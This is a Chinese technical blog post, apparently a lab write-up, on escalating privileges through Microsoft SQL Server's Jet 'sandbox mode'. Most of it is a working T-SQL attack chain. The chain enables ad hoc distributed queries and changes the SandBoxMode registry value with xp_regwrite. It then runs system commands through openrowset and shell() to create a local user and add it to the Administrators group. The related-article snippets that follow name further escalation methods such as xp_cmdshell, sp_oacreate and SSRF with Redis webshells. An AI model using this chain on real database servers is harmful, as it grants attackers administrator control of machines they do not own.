【SQL Server】沙盒提权

最新推荐文章于 2023-10-11 16:05:40 发布
最新推荐文章于 2023-10-11 16:05:40 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: 数据库安全 文章标签: 数据库 mssql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/117219164
版权

【SQL Server】沙盒提权


实验环境:windowsXP + SQL Server2005

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';
--执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')

-- 恢复配置
exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

沙盒模式SandBoxMode参数含义(默认是2)

0:在任何所有者中禁止启用安全模式

1 :为仅在允许范围内

2 :必须在access模式下

3:完全开启

openrowset是可以通过OLE DB访问SQL Server数据库,OLE DB是应用程序链接到SQL Server的的驱动程序。

image-20210524102135136

关闭沙盒,并创建用户xiamo,然后将用户xiamo添加到administrators组中:

image-20210524103513668

如图所示,添加成功:

image-20210524103543278

image-20210524103631184

如图所示,提权成功!

0ak1ey
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
iOS 沙盒图片保存读取实例
08-28
下面小编就为大家分享一篇iOS 沙盒图片保存读取实例,具有很的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
第三方组件提权-SQL server提权
Love&Share
11-20 2533
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
mssql提权总结
st3pby的博客
12-30 2539
mssql提权总结
Windows权限提升 —SQL Server/MSSQL数据库提权
剁椒鱼头没剁椒的博客
03-21 1939
在之前的Windows权限提升—MySQL数据库提权中已经介绍了关于数据库方面的权限提升,同时在Windows权限提升—溢出提权的时候,简要的介绍了关于Windows提权方面整体的流程与方式,这里就不再赘述,直接进行Windows权限提升—SQL Server/MSSQL数据库提权SQL Server与MSSQL其实就是一个东西,只是叫法不同。Windows权限提升—MySQL数据库Windows权限提升—溢出提权
SQL Server提权总结与记录-xp_cmdshell/sp_oacreate/sandbox提权
baynk的博客
05-17 4900
0x00 Sql server提权基础 Sql server也称Mssql Server,是微软家的数据库,但是要注意,sql server同样也能在linux中安装使用,本文主要记录sql server提权方式。 sql server提权主要依赖于sql server自带的存储过程。 存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使
数据库提权--MSSQL
最新发布
qq_45936617的博客
10-11 421
MSSQL是微软公司开发的数据库,又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站,通常使用的就是MSSQL数据库。常见的MSSQL数据库提权方式有 xp_cmdshell提权、sp_oacrate提权沙盒提权及JOB提权等,本文学习的是三种提权方式利用原理、利用条件以利用方法。
【权限提升】六种数据库提权&口令获取
今天是几号的博客
02-15 1429
MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。绑定需要访问数据库的IP。
2021-06-01web渗透学习之sqlserver提权(转)
qq_45290991的博客
06-01 426
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 假设条件: 1、已...
sqlserver提权失败_MSSQL沙盒模式提权问题总结
weixin_39636102的博客
12-23 310
MSSQL沙盒模式提权问题总结恢复对注册表的读写存储。dbcc addextendedproc ('xp_regread','xpstar.dll')dbcc addextendedproc ('xp_regwrite','xpstar.dll')修复沙盒的维护模式exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\J...
内网渗透学习03——权限提升分析与防御
box
02-22 3172
目录0x00 缺失补丁发现1. 命令查询补丁2. 工具查询补丁3. 其他补丁查询工具0x01数据库提权1. mysql数据库2. SQL Server 数据库提权3. Redis提权4. PostgreSql 数据库提权0x02 windows操作系统配置错误1. PowerUp2. AlwaysInstallElevated 提权3. Metasploit service_permissions利用4. 可信服务路径漏洞0x03 组策略首选项提权1. SYSVOL2. Group.xml3. 密码破解方式
iOS 13.5修复的沙盒提权漏洞解析
ccnyou的专栏
04-22 843
背景 要阅读此文,首先需要了解以下背景知识: 首先,iOS 沙盒进程访问一个资源的过程是这样的: 其次,iOS App的权限是通过 XML 格式声明的,一个典型的Debug权限如下: <key>get-task-allow</key> <true/> 这里声明了App具有 get-task-allow 权限,此权限将允许其他进程附加到App进行调试。 另外,AMFID使用 CoreFoundation.framework 里边的 CFPropertyLi
沙盒
02-28
沙盒
iOS沙盒总结
03-02
1、获取程序的Home目录 NSString *path = NSHomeDirectory(); NSLog(@"path:%@",path); 打印结果: path:/Users/username/Library/Application Support/iPhone Simulator/5.1/Applications/BAE91297-A4C6-4DDC-A9...
区块链沙盒云白皮书v1.0
10-17
区块链沙盒云白皮书 v1.0
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3142
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
Windows系统安全
qq_43665434的博客
05-26 2996
Windows系统安全 一、课程目标 理解Windows账户的基本概念、账户风险与安全策略、访问控制、安全审计、文件系统的安全机制和安全策略。 Windows系统的安全配置方法。 二、系统安全配置及用户账户管理 1、账户的基本概念 Windows安全主体 账户:在操作系统中,账户是操作系统进行权限管理的基本单元 用户组:用户组是由多个用户组成的一个群体,这个群体对某个资源拥有相同的权限。 用户账户 本地用户 域用户 在windows系统中,用户可以分为本地用户和域用户。而本地用户与
SQL Server】sp_oacreate获取服务器最高权限
qq_43665434的博客
05-23 2036
SQL Server】sp_oacreate获取服务器最高权限 前言 使用sp_oacreate的提权语句,主要是用来调用OLE对象(Object Linking and Embedding的缩写,VB中的OLE对象),利用OLE对象的run方法执行系统命令。在oacreate的官方文档里明确指出了,如果要使用OLE对象,必须要开启 ‘Ole Automation Procedures’,也就是EXEC sp_configure 'Ole Automation Procedures', 1;执行这条语句
SSRF+redis写入webshell
qq_43665434的博客
04-03 1427
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redis和web服务(redis未授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf和redis未授权访问写入webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell写入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下写入
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1394
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为
windows 沙盒
09-11
Windows沙盒是Windows操作系统中的一个安全保护机制。它提供了一个隔离的环境,可以运行不受信任的应用程序,而不会对主机操作系统和其他应用程序造成损害。 Windows沙盒使用虚拟化技术,将应用程序运行在一个隔离的虚拟环境中。这个环境与主机操作系统完全隔离,应用程序无法对主机系统进行更改或访问敏感数据。当应用程序在沙盒中运行时,它们的文件和注册表修改将只影响到沙盒本身,不会对主机操作系统产生任何影响。 通过使用Windows沙盒,用户可以安全地打开未知来源的文件、运行不受信任的应用程序,或测试新的软件,而不必担心对主机系统的影响。一旦关闭沙盒,所有在沙盒中进行的更改将被丢弃,不会对主机系统留下任何痕迹。 需要注意的是,Windows沙盒并非完全隔离和安全的环境,仍然存在一些漏洞和限制。因此,在使用Windows沙盒时,仍然需要谨慎处理不受信任的应用程序和文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值